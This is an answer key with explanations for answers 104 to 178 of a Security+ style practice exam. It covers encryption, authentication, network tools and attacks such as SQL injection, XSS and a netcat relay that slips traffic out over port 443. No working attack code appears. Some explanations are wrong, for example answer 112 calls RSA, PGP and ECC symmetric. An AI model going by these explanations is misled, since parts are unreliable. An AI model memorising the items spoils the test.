A smurf attack occurs when an attacker sends a ping to a subnet broadcast address and devices reply to spoofed IP (victim server), using up bandwidth and processing power. This image is a graphical depiction of this type of attack.

Answer 104

A

Static code analyzer

OBJ-3.6: DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues without actually running the code. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program through the use of a fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file that can be recompiled successfully. Fault injection is a testing technique that aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and fault injector are all dynamic analysis tools because they require the program being tested to be run in order to be analyzed

Answer 105

A

WPA2 and AES

OBJ-6.3: The most secure wireless network configuration utilizes WPA2 with AES encryption. WPA2 is the most secure wireless encryption standard, as it has replaced both WPA and WEP. AES is an extremely strong encryption algorithm that is used by default in the WPA2 standard.

Answer 106

A

dbsvr01

OBJ-2.3: Due to the very large increase in network utilization on dbsvr01, it should be suspected of compromise and be investigated further. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This increase is nearly 8x more than the previous month when all of the other servers stayed relatively constant. This is indicative of a possible compromise of the database server (dbsvr01) and a data breach or data exfiltration.

Answer 107

A

CSR

OBJ-6.4: A CSR (certificate signing request) is what is submitted to the CA (certificate authority) to request a digital certificate. Key escrow stores keys, CRL is a list of revoked certificate, and the OCSP is a status of certificates that provides validity such as good, revoked, or unknown.

Answer 108

A

Wiping

OBJ-5.7: Data wiping or clearing occurs by using a software tool to overwrite the data on a hard drive in an effort to destroy all electronic data on a hard disk or other media. Data wiping may be performed with a 1x, 7x, or 35x overwriting, with a higher number of times being more secure. This allows the hard drive to remain functional and allows for hardware reuse. Degaussing a hard drive involves demagnetizing a hard drive to erase its stored data. You cannot reuse a hard drive once it has been degaussed. Therefore, it is a bad solution for this scenario. Purging involves the removal of sensitive data from a hard drive using the device’s own electronics or an outside source (like a degausser). A purged device is generally not reusable. Shredding involves physical destruction of the hard drive. This is a secure method of destruction but doesn’t allow for device reuse.

Answer 109

A

Removable media

OBJ-3.5: Airgaps are designed to remove connections between two networks in order to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.

Answer 110

A

Block all unused ports on the switch, router, and firewall / Logically place the Windows 2019 server into the network’s DMZ

OBJ-2.1: To best secure the server, you should logically place the Windows 2019 server into the network’s DMZ and block all unused ports on the switch, router, and firewall. Since the server will be used to allow remote connections from across the internet to access the server directly, the server must be placed into the De-Militarized Zone (DMZ) of the network and not in the internal trusted portion of the network. Additionally, any server or services that are going to be forward-facing to the internet (like a Remote Desktop Services server) should have all of the unused ports blocked on the switch, router, and firewall to minimize the footprint of the network. By blocking unused ports, there are fewer ways for an attacker to get into the network and to attack the server.

Answer 111

A

Smart card

OBJ-4.1: A smart card is used in applications that need to protect personal information and/or deliver fast, secure transactions, such as transit fare payment cards, government, and corporate identification cards, documents such as electronic passports, visas, and financial payment cards. Often, smart cards are used as part of a multifactor authentication system where the smart card and a PIN needs to be entered for system authentication to occur.

Answer 112

A

3DES

OBJ-6.2: Triple DES (3DES) is a symmetric-key block cipher that applies the DES cipher algorithm three times to each data block to increase its security over DES. RSA, PGP, and ECC are all symmetric algorithms.

Answer 113

A

RADIUS

OBJ-4.2: Remote Authentication Dial-In User Service (RADIUS) is a networking protocol, operating on port 1812 that provides centralized Authentication, Authorization, and Accounting (AAA or Triple A) management for users who connect and use a network service. The RADIUS protocol utilizes an obfuscated password that is created from the shared secret and creates a MD5 hash of the authentication request to protect the communications.

Answer 114

A

443

OBJ-2.6: Port 443 is used for HTTPS traffic. Therefore, this port must be opened. This is secure web browsing over SSL or TLS. Port 21 is used for the File Transfer Protocol (FTP). Port 80 is used for unsecured web browsing (HTTP). Port 143 is used for Internet Mail Application Protocol (IMAP).

Answer 115

A

The attachment is using a double file extension to mask its identity

OBJ-1.2: The message contains a file attachment in the hope that the user will execute or open it. The nature of the attachment might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black pop-up window that appears and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.

Answer 116

A

VLAN

OBJ-3.2: A virtual local area network (VLAN) is a type of network segmentation that is configured in your network switches that prevent communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual network’s data. A virtual private network (VPN) is a type of remote access capability to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired

Answer 117

A

SQL injection

OBJ-1.2: A SQL injection poses the most direct and more impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to the disclosure of sensitive information. A buffer overflow attack attempts to overwrite the memory buffer in order to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to cause a disclosure of information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for the running of other malicious code. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused against the user, not the server or database.

Answer 118

A

802.1x

OBJ-6.3: If you are using RADIUS/TACACS+ with the switch, you will need to use 802.1x for the protocol.

Answer 119

A

Web application cryptography vulnerability

OBJ-1.6: This vulnerability should be categories as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger protocol should be used, such as forcing the use of AES.

Answer 120

A

ECC

OBJ-6.2: Elliptic-curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. As a public-key cryptosystem, it relies on an asymmetric algorithm. Twofish, RC4, and DES are all symmetric algorithms.

Answer 121

A

Application whitelisting

OBJ-3.3: Application whitelisting will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation again a zero-day virus. An intrusion detection system might detect the anomalous activity created by a piece of malware, but it will only log or alert based on the activity, not prevent it. A host-based firewall may prevent a piece of malware from establishing a network connection with a remote server, but again, it wouldn’t prevent an infection or prevent it from executing. An anti-malware solution is a good investment towards improving your security, but since the threat is a zero-day virus, an anti-malware solution will not be able to detect it using its signature database.

Answer 122

A

SSH

OBJ-2.2: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

Answer 123

A

10.0.19.121 is a client that is accessing an SSH server over port 52497

OBJ-2.2: This output from the tcpdump command is displaying three packets in a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) is running an SSH server over port 22. This is based on the first line of the output. The second and third lines are the server responding to the request and sending data back to the client (10.0.19.121) over port 52497. There is not evidence of an attack against either the server or the client based on this output since we can only see the headers and not the content being sent between the client and server.

Answer 124

A

RIPEMD

OBJ-6.2: RIPEMD creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

Answer 125

A

Router and switch-based MAC address reporting

OBJ-2.2: The best option is MAC address reporting coming from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port it is connected to on a network device.

Answer 126

A

Passive

OBJ-3.2: Network taps are devices that allow a copy of network traffic to be captured for analysis. They conduct passive network monitoring and visibility without interfering with the network traffic itself. Active monitoring relies on the scanning of targeted systems, not a network tap. Router-based monitoring would involve looking over the router’s logs and configuration files. SNMP is used to monitor network devices, but is considered a form of active monitoring and doesn’t rely on network taps.

Answer 127

A

Cross-site scripting

OBJ-1.2: This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If your website’s HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a pop-up window that collects passwords and uses that information to further compromise other accounts. A cross-site request forgery (CSRF) is an attack that forces an end-user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the browser of a victim user (such as creating pop-ups). A CSRF would allow an attack to induce a victim to perform actions that they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to gain control of a computer system without being detected. SQL injection is the placement of malicious code in SQL statements, via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or an SQL injection.

Answer 128

A

Install an anti-virus or anti-malware solution that uses heuristic analysis

OBJ-2.1: The only solution provided that could STOP this from reoccurring would be to use an anti-virus or anti-malware solution with heuristic analysis. The other options might be able to monitor and detect the issue, but not stop it from spreading. Heuristic analysis is a method employed by many computer anti-virus programs designed to detect previously unknown computer viruses, as well as new variants of viruses already in the wild. This is behavior-based detection and prevention, so it should be able to detect the issue in the scenario provided and stop it from spreading throughout the network.

Answer 129

A

IdP

OBJ-4.2: The IdP provides the validation of the user’s identity. Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the identity of a user (the principal) can be trusted by the SP without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

Answer 130

A

Banner grabbing

OBJ-2.2: Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting the response from the webserver. This banner usually contains the operating system being run by the server as well as the version number of the service (SSH) being run. This is the fastest and easiest way to determine the version of SSH being run on this web server. While it is possible to use a vulnerability scanner, protocol analyzer, or to conduct a passive scan to determine the version of SSH, these are more time consuming and not fully accurate methods to determine the version being run.

Answer 131

A

Agent-based scanning

OBJ-1.5: Using agent-based scanning, you typically get the most reliable results for systems that are not connected to the network, as well as the ones that are connected. This is ideal for traveling salespeople since their laptops are not constantly connected to the organization’s network. These agent-based scans can be conducted when the laptop is offline, and then sent to a centralized server the next time the laptop is connected to the network. Server-based scanning, non-credentialed scanning, and passive network monitoring all require a continuous network connection in order for them to accurately collect the configurations of the devices.

Answer 132

A

PGP

OBJ-6.2: Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications. PGP is a public-key cryptosystem and relies on an asymmetric algorithm. AES, RC4, and 3DES are all symmetric algorithms.

Answer 133

A

FTK Imager

OBJ-5.5: FTK Imager can create perfect copies or forensic images of computer data without making changes to the original evidence. The forensic image is identical in every way to the original, including file slack and unallocated space or drive free space. The dd tool can also be used to create forensic images, but it is not a proprietary tool since it is open-source. Memdump is used to collect the content within RAM on a given host. Autopsy is a cross-platform, open-source forensic tool suite.

Answer 134

A

Cross-site scripting

OBJ-1.2: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Answer 135

A

Diffie-Hellman

OBJ-6.2: The Diffie-Hellman (DH) is used as a method of securely exchanging cryptographic keys over a public channel and was one of the first public-key protocols. As a public-key protocol, it relies on an asymmetric algorithm. AES, RC4, and Blowfish are all symmetric algorithms.

Answer 136

A

SNMP

OBJ-2.6: SNMP is used to monitor and manage networks, both physical and virtual. SMTP is used for email. BGP and EIGRP are used for routing network data.

Answer 137

A

Require authentication on wake-up

OBJ-4.1: To prevent the computer from being used inadvertently to access the network, the system should be configured to require authentication whenever the computer is woken up. Therefore, if an authorized user walks away from the computer and it goes to sleep, when another person tries to use the computer, it will ask for a username and password prior to granting them access to the network.

Answer 138

A

This appears to be normal network traffic

OBJ-2.2: This appears to be normal network traffic. The first line shows that a DNS lookup was performed for a website (test.diontraining.com). The second line shows the response from the DNS server with the IP address of the website. The third line begins a three-way handshake between an internal host and the website. The fourth line is the SYN-ACK response from the website to the internal host as part of this handshake. The fifth line is a standard Windows NetBIOS query that occurs within the local area network to translate human-readable names to local IP addresses. The sixth and seventh lines appear to be inbound requests to port 443 and port 8080, both of which were sent the RST by the firewall of the internal host since it is not running those services on the host. None of this network traffic appears to be suspicious.

Answer 139

A

Implement a VLAN to separate the HVAC control system from the open wireless network

OBJ-3.2: A VLAN is useful to segment out network traffic to various parts of the network, and can stop someone from the open wireless network from being able to attempt to login to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance and determine if it is a ‘known’ machine, but they would still be given access to the entire network. Also, since this is a publicly usable network, using NAC would prevent users from accessing all the network features, possibly. An IDS would be a good solution to detect the attempted logins, but it won’t be able to prevent them. Instead, an IPS would be required to prevent logins.

Answer 140

A

RADIUS

OBJ-6.3: With RADIUS and SSO configured, users on the network can provide their user credentials one time (when they initially connect to the wireless access point or another RADIUS client), and they are automatically authenticated to all of the network’s resources.

Answer 141

A

Host-based firewall, Network sniffer, Cable lock, CAT5e STP

OBJ 3.9: Host-based firewall, Network sniffer, a Cable lock, and CAT5e STP cables are all appropriate security features to use with a corporate workstation or laptop. By using a host-based firewall (such as Windows Firewall), you can configure the workstation or laptop to block incoming or outgoing data from the network connection of the device. If you install a network sniffer, you will be able to capture any network traffic that is being used on the network for later analysis. If you use a cable lock, it will lock the workstation or laptop to a desk and prevent theft of the device. If you use a CAT 5e STP cable for your network connection, you will minimize the risk of EMI and reduce data emanations.

Answer 142

A

Any malicious inbound TCP packet

OBJ-2.4: The rule header is set to alert only on TCP packets based on the first line of this IDS rule. The flow condition is set as “to_client, established”, which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to be able to create your own IDS rules, but you should be able to read them and pick out generic content like the type of protocol covered by the signature, the port be analyzed, and the direction of flow.

Answer 143

A

DES

OBJ-6.2: The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of digital data. Although its short key length of 56 bits makes it too insecure for applications, it was the standard used from 1977 until the early 2000s. GPG, ECC, and DSA are all asymmetric algorithms.

Answer 144

A

23

OBJ-2.2: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data like usernames and passwords. As an analyst, you should recommend that telnet is disabled and blocked from use. The other ports that are open are for SSH (port 22), DNS (port 53), and HTTPS (port 443).

Answer 145

A

SPI

OBJ-5.8: According to the GDPR, information about an individual’s race or ethnic origin is classified as Sensitive Personal Information (SPI). Sensitive personal information (SPI) is information about a subject’s opinions, beliefs, and nature that is afforded specially protected status by privacy legislation. As it cannot be used to uniquely identify somebody, or make any relevant assertions about health, it is neither PII nor PHI. Data loss prevention (DLP) is a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks.

Answer 146

A

Use SCCM to validate patch status for each machine on the domain

OBJ-2.4: The Microsoft System Center Configuration Manager (SCCM) provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory. In an Azure environment, you can also use the Update Compliance tool to monitor your device’s Windows updates, Windows Defender anti-virus status, and the up to date patching status across all of your Windows 10 workstations. In previous versions of Windows, you could use the Microsoft Baseline Analyzer (MSBA), but that is no longer supported when Windows 10 was introduced. A PowerShell script may be a reasonable option, but it would take a knowledgeable analyst to create the script and scan the network, whereas using SCCM is easier and quicker. Manually checking the Update History or registry of each system could also work, but that is very time consuming and inefficient, especially if Ryan is supporting a large network.

Answer 147

A

ABAC

OBJ-4.3: Attribute-based access control (ABAC) provides the most detailed and explicit type of access control over a resource because it is capable of making access decisions based on a combination of subject and object attributes, as well as context-sensitive or system-wide attributes. Information such as the group membership, the OS being used by the user, and even the IP address of the machine could be considered when granting or denying access.

Answer 148

A

Virtualization

OBJ-3.3: When you have a limited amount of hardware resources to utilized but have a required to test multiple operating systems, you should set up a virtualized environment to test the patch across each operating system prior to deployment. You should never deploy patches directly into production without testing them first in the lab.

Answer 149

A

User and entity behavior analytics

OBJ-3.5: Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, the use of user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning, and may have a higher false positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and to embedded hardware, such as Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.

Answer 150

A

DAC

OBJ-4.3: Discretionary access control (DAC) stresses the importance of the owne. The original creator of the resource is considered the owner and can then assigned permissions and ownership to others. The owner has full control over the resource and the ability to modify its ACL to grant rights to others. This is the most flexible model and is currently implemented widely in Windows, Unix, Linux, and macOS systems.

Answer 151

A

Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

OBJ-2.2: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to be run during a single command execution. Next, netcat is being told to send the data to the given IP (192.168.1.76) over port 443. This is a common technique to try to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

Answer 152

A

Insecure direct object reference

OBJ-1.2: Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. In this scenario, an attacker could simply change the userid number and directly access any user’s profile page. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer. Weak or default configurations are commonly a result of incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information. Improper handling of errors can reveal implementation details that should never be revealed, such as detailed information that can provide hackers important clues on potential flaws in the system.

Answer 153

A

User authentication

OBJ-3.3: User authentication is performed at a much higher level in the operating system. Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. The chip includes multiple physical security mechanisms to make it tamper-resistant, and malicious software is unable to tamper with the security functions of the TPM. The TPM provides random number generation, secure generation of cryptographic keys, remote attestation, binding, and sealing functions securely.

Answer 154

A

NAC

OBJ-2.1: Network Access Control (NAC) prevents unauthorized users from connecting to a network. Firewalls and intrusion prevention systems (IPS) are meant to restrict access from external sources and block known attacks. They would not keep out an intruder who is already in range of the wireless network. Network segmentation would limit the access that an intruder has to network resources but would not block the connection itself.

Answer 155

A

RC4

OBJ-6.2: RC4, or Rivest Cipher 4, is a symmetric stream cipher that was used in WEP and TLS. ECC, RSA, and Diffie-Hellman are all asymmetric algorithms.

Answer 156

A

netstat

OBJ-2.2: The netstat command is used to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols) on a Windows machine. This is a useful command when trying to determine if any malware has been installed on the system and maybe maintaining a remote connection with a command and control server.

Answer 157

A

AES

OBJ-6.2: The Advanced Encryption Standard (AES) is a symmetric block cipher with a fixed block size of 128 bits. It can utilize a 128-bit, 192-bit, or 256-bit symmetric key. RSA, Diffie-Hellman, and ECC are all asymmetric algorithms.

Answer 158

A

ECC

OBJ-6.2: Elliptic curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. One of the main benefits of ECC over non-ECC cryptography is an application that can achieve the same level of security provided by non-ECC cryptography while using a shorter key length. For example, an ECC algorithm using a 256-bit key length is just as strong as a RSA or Diffie-Hellman algorithm using a 3072-bit key length.

Answer 159

A

SHA-1

OBJ-6.2: SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

Answer 160

A

Clear

OBJ-5.8: Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.

Answer 161

A

Cain and Abel

OBJ-2.2: Cain and Abel is a popular password cracking tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding, too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

Answer 162

A

Measured boot

OBJ-3.3: Measured boot is a feature where a log of all boot actions is taken and stored in a trusted platform module for later retrieval and analysis by anti-malware software on a remote server. Master boot record analysis is used to capture the required information of the hard disk to support a forensic investigation and would not detect malware during the system’s boot-up process. Startup control would be used to determine which programs will be loaded when the operating system is initially booted, but this would be too late to detect malware loaded during the pre-startup and boot process. Advanced anti-malware solutions are programs that are loaded within the operating system. Therefore, they are loaded too late in the startup process to be effective against malicious boot sector viruses and other BIOS/UEFI malware variants.

Answer 163

A

Implement a jumpbox system

OBJ-3.2: A jumpbox is a system on a network used to access and manage devices in a separate security zone. This would create network segmentation between the supplier’s laptops and the rest of the network to minimize the risk. A jump-box system is a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them. While the other options listed are all good security practices, they do not fully mitigate the risk that insecure systems pose since Victor cannot enforce these configurations on a supplier provided laptop. Instead, he must find a method of segmenting the laptops from the rest of the network, either physically, logically, using an airgap, or using a jumpbox.

Answer 164

A

MAC

OBJ-4.3: Mandatory Access Control (MAC) requires all access to be predefined based on system classification, configuration, and authentication. MAC is commonly used in highly centralized environments and usually relies on a series of labels, such as classification levels of the data.

Answer 165

A

SQL injection

OBJ-1.2: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common technique in SQL injection is to insert a statement that is always true, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into a HTTP response header. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of the application. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end-user.

Answer 166

A

RC4

OBJ-6.2: RC4, or Rivest Cipher 4, is a symmetric stream cipher that was used in WEP and TLS. AES, Blowfish, and DES are all block ciphers.

Answer 167

A

Cryptographic erase

OBJ-3.3: In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is often used with solid-state devices. Cryptographic erase can be used with hard drives, as well. Zero-fill is a process that fills the entire storage device with zeroes. For SSDs and hybrid drives, zero-fill-based methods might not be reliable because the device uses wear-leveling routines in the drive controller to communicate which locations are available for use to any software process accessing the device. A secure erase is a special utility provided with some solid-state drives that can perform the sanitization of flash-based devices. Overwrite is like zero-fill but can utilize a random pattern of ones and zeroes on the storage device. The most secure option would be a cryptographic erase (CE) for the scenario provided in the question.

Answer 168

A

Single quote

OBJ-1.2: The single quote character (‘) is used because this is the character limiter in SQL. With a single quote,’ you delimit strings, and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly, you can end any string supplied to the application and add other SQL code after that, which is a common technique for SQL injections. A semicolon is a commonly used character at the end of a line of code or command in many programming languages. An exclamation mark is often used to comment a line of code in several languages. Double quotes are often used to contain a string being passed to a variable.

Answer 169

A

Smart card

OBJ-4.3: Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certificate embedded within the smart card (PIV/CAC) that is presented to the system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital certificate to be presented to the system.

Answer 170

A

Ping flood

OBJ 1.2: A Ping flood occurs when an attacker attempts to flood the server by sending too many ICMP echo request packets (which are known as pings).

Answer 171

A

White team

OBJ-5.4: Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender’s mission. A red team is a group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. A blue team is a group of people responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers. The purple team made up of members of both the blue and red teams in order to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.

Answer 172

A

Nessus

OBJ-2.2: Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can be used to perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Answer 173

A

Cellular data, Remote wipe, Location tracking, MDM

OBJ 2.5: Cellular data, Remote wipe, Location tracking, and MDM are all appropriate security features to use with a company-provided laptop. By using cellular data, your users will be able to avoid connecting to WiFi networks for connectivity. Remote wipe enables the organization to remotely erase the contents of the device if it is lost or stolen. Location tracking uses the smart phone’s GPS coordinates for certain apps, location-based authentication, and to track down a device if it is lost or stolen. A mobile device management (MDM) program enables the administrators to remotely push software updates, security policies, and other security features to the device from a centralized server.

Answer 174

A

tracert

OBJ-2.2: The TRACERT (spoken out loud as trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and a number of network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.

Answer 175

A

RP

OBJ-4.2: Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties between an identity provider and a service provider (SP) or relaying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.

Answer 176

A

Dictionary attack

OBJ-1.2: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

Answer 177

A

Context-based authentication

OBJ-4.1: Context-based authentication can take a number of factors into consideration before permitting access to a user, including their location (e.g., country, GPS location, etc.), the time of day, and other key factors to minimize the threat of compromised credentials from being utilized by an attacker. A self-service password reset is defined as any process or technology that allows users who have either forgotten their password or triggered an intruder lockout to authenticate with an alternate factor and repair their own problem without calling the help desk. While helpful, this alone would not help prevent an attacker from using the compromised credentials. Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems. Again, this is helpful since it will minimize the number of usernames and passwords that a user must remember, but if their credentials are stolen, then the attacker can now access every system the user had access too, extending the problem. Password complexity is also a good thing to use, but it won’t address the challenge presented in the question of how to prevent the use of compromised credentials. If the password complexity is increased, this will prevent a brute force credential compromise, but if the credentials are compromised any other way, then the attacker could still log in to our systems and cause trouble for us.

Answer 178

A
